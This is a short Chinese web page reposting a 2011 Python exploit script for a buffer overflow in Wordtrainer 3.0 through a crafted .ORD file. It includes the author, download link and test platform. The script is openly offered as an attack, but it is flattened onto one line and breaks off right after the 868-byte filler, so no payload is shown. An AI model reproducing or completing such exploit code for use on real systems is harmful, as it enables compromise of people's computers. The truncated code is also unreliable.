# Wordtrainer 3.0 .ORD文件緩衝區溢出漏洞
==EXP==
#!/usr/bin/python # #[+]Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability #[+]Date: 12\04\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.wordtrainer.net/software/files/wt307shw_exe/wt307shw.exe #[+]Version: 3.0 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # # from struct import pack from time import sleep print """ Exploit Buffer Overflow Wordtrainer 3.0 Created BY C4SS!0 G0M3S E-mail Louredo_@hotmail.com Site www.exploit-br.org """ buf = ("\x41" * 868) buf += pack('
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容